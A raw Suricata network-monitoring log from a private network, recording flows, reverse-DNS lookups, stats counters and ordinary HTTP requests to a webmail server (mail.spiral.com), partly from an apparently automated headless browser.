{"timestamp":"2020-02-29T00:17:14.000486+0000","flow_id":198980151024429,"event_type":"flow","src_ip":"192.168.10.130","src_port":34848,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1102,"bytes_toclient":774,"start":"2020-02-29T00:15:52.465709+0000","end":"2020-02-29T00:16:13.631724+0000","age":21,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:18.000223+0000","event_type":"stats","stats":{"uptime":14690,"capture":{"kernel_packets":136285,"kernel_drops":0},"decoder":{"pkts":136288,"bytes":93702498,"invalid":191,"ipv4":134766,"ipv6":9,"ethernet":136288,"raw":0,"null":0,"sll":0,"tcp":129366,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2783,"new_pruned":16,"est_pruned":2426,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":1952,"memcap":0}}} {"timestamp":"2020-02-29T00:17:19.118914+0000","flow_id":1653011270062210,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44867,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44829,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:19.227917+0000","flow_id":1653011270062210,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44867,"proto":"UDP","dns":{"type":"answer","id":44829,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:19.227917+0000","flow_id":1653011270062210,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44867,"proto":"UDP","dns":{"type":"answer","id":44829,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:19.438006+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8119}} {"timestamp":"2020-02-29T00:17:21.000492+0000","flow_id":1584978968453450,"event_type":"flow","src_ip":"192.168.10.122","src_port":54606,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:20.598346+0000","end":"2020-02-29T00:12:20.707223+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:21.000827+0000","flow_id":1230407958635898,"event_type":"flow","src_ip":"192.168.10.130","src_port":34850,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:16:13.632186+0000","end":"2020-02-29T00:16:20.087703+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:23.000471+0000","flow_id":1032113613812835,"event_type":"flow","src_ip":"192.168.10.81","src_port":52764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1143,"bytes_toclient":712,"start":"2020-02-29T00:16:17.570467+0000","end":"2020-02-29T00:16:22.723356+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:23.525111+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52768,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8119},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47734,"tx_id":0}} {"timestamp":"2020-02-29T00:17:23.536842+0000","flow_id":1688526354854154,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34841,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31688,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:23.645551+0000","flow_id":1688526354854154,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34841,"proto":"UDP","dns":{"type":"answer","id":31688,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:23.645551+0000","flow_id":1688526354854154,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34841,"proto":"UDP","dns":{"type":"answer","id":31688,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:23.720422+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5559}} {"timestamp":"2020-02-29T00:17:25.000160+0000","event_type":"stats","stats":{"uptime":14697,"capture":{"kernel_packets":136295,"kernel_drops":0},"decoder":{"pkts":136310,"bytes":93713038,"invalid":191,"ipv4":134787,"ipv6":10,"ethernet":136310,"raw":0,"null":0,"sll":0,"tcp":129385,"udp":5196,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2802,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2818,"synack":2809,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1840,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2377,"failed_udp":112},"tx":{"http":4705,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2457}},"flow_mgr":{"closed_pruned":2784,"new_pruned":16,"est_pruned":2427,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21489,"memcap_state":0,"memcap_global":0},"http":{"memuse":53624,"memcap":0}}} {"timestamp":"2020-02-29T00:17:26.393012+0000","flow_id":256953625804596,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54415,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60400,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:26.501632+0000","flow_id":256953625804596,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54415,"proto":"UDP","dns":{"type":"answer","id":60400,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:26.501632+0000","flow_id":256953625804596,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54415,"proto":"UDP","dns":{"type":"answer","id":60400,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:26.651304+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34864,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=oZ_HnvDV1RzcsAiiL_PzNnX&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6988}} {"timestamp":"2020-02-29T00:17:27.159302+0000","flow_id":1466579625143878,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60762,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35202,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:27.267472+0000","flow_id":1466579625143878,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60762,"proto":"UDP","dns":{"type":"answer","id":35202,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:27.267472+0000","flow_id":1466579625143878,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60762,"proto":"UDP","dns":{"type":"answer","id":35202,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:27.371073+0000","flow_id":1424381571475841,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17052,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:27.479187+0000","flow_id":1424381571475841,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34842,"proto":"UDP","dns":{"type":"answer","id":17052,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:27.479187+0000","flow_id":1424381571475841,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34842,"proto":"UDP","dns":{"type":"answer","id":17052,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:28.000481+0000","flow_id":1565664501029723,"event_type":"flow","src_ip":"192.168.10.122","src_port":42020,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:27.645979+0000","end":"2020-02-29T00:12:27.754252+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:28.721639+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52768,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5559},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":29494,"tx_id":1}} {"timestamp":"2020-02-29T00:17:29.000319+0000","flow_id":1151071323182789,"event_type":"flow","src_ip":"192.168.10.130","src_port":34852,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":2061,"bytes_toclient":1048,"start":"2020-02-29T00:16:20.087749+0000","end":"2020-02-29T00:16:28.369273+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:29.282797+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34864,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=oZ_HnvDV1RzcsAiiL_PzNnX&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6988},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37030,"tx_id":0}} {"timestamp":"2020-02-29T00:17:29.293462+0000","flow_id":645583741745750,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57080,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:29.401593+0000","flow_id":645583741745750,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51707,"proto":"UDP","dns":{"type":"answer","id":57080,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:29.401593+0000","flow_id":645583741745750,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51707,"proto":"UDP","dns":{"type":"answer","id":57080,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:29.490446+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34864,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5124}} {"timestamp":"2020-02-29T00:17:31.000306+0000","flow_id":1009264372926241,"event_type":"flow","src_ip":"192.168.10.122","src_port":50814,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:30.444193+0000","end":"2020-02-29T00:12:30.552573+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:32.000182+0000","event_type":"stats","stats":{"uptime":14704,"capture":{"kernel_packets":136375,"kernel_drops":0},"decoder":{"pkts":136386,"bytes":93749613,"invalid":192,"ipv4":134859,"ipv6":10,"ethernet":136386,"raw":0,"null":0,"sll":0,"tcp":129446,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2786,"new_pruned":16,"est_pruned":2428,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22151,"memcap_state":0,"memcap_global":0},"http":{"memuse":53676,"memcap":0}}} {"timestamp":"2020-02-29T00:17:34.495901+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34864,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5124},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":24087,"tx_id":1}} {"timestamp":"2020-02-29T00:17:35.000918+0000","flow_id":1661936193407531,"event_type":"flow","src_ip":"192.168.10.122","src_port":56201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:34.494123+0000","end":"2020-02-29T00:12:34.602655+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:35.001148+0000","flow_id":964081317209505,"event_type":"flow","src_ip":"192.168.10.122","src_port":58854,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:34.681377+0000","end":"2020-02-29T00:12:34.789685+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:36.000818+0000","flow_id":1937329496453146,"event_type":"flow","src_ip":"192.168.10.122","src_port":38808,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:34.913434+0000","end":"2020-02-29T00:12:35.022032+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:38.000914+0000","flow_id":571869214283118,"event_type":"flow","src_ip":"192.168.10.130","src_port":34856,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":1223,"bytes_toclient":9670,"start":"2020-02-29T00:16:32.005486+0000","end":"2020-02-29T00:16:37.187743+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:39.000237+0000","event_type":"stats","stats":{"uptime":14711,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2786,"new_pruned":16,"est_pruned":2432,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21158,"memcap_state":0,"memcap_global":0},"http":{"memuse":36692,"memcap":0}}} {"timestamp":"2020-02-29T00:17:39.002411+0000","flow_id":745403072685010,"event_type":"flow","src_ip":"192.168.10.130","src_port":34854,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":15,"bytes_toserver":2042,"bytes_toclient":12710,"start":"2020-02-29T00:16:28.369618+0000","end":"2020-02-29T00:16:38.383459+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:39.002598+0000","flow_id":2162338538366341,"event_type":"flow","src_ip":"192.168.10.122","src_port":38589,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:38.435589+0000","end":"2020-02-29T00:12:38.543962+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:45.000418+0000","flow_id":1172073699101454,"event_type":"flow","src_ip":"192.168.10.122","src_port":35264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:44.805646+0000","end":"2020-02-29T00:12:44.913873+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:45.001175+0000","flow_id":224552373988062,"event_type":"flow","src_ip":"192.168.10.122","src_port":54903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:44.600798+0000","end":"2020-02-29T00:12:44.709050+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:45.001359+0000","flow_id":1915120221140576,"event_type":"flow","src_ip":"192.168.10.122","src_port":34113,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:43.898656+0000","end":"2020-02-29T00:12:44.006850+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:46.000182+0000","event_type":"stats","stats":{"uptime":14718,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_m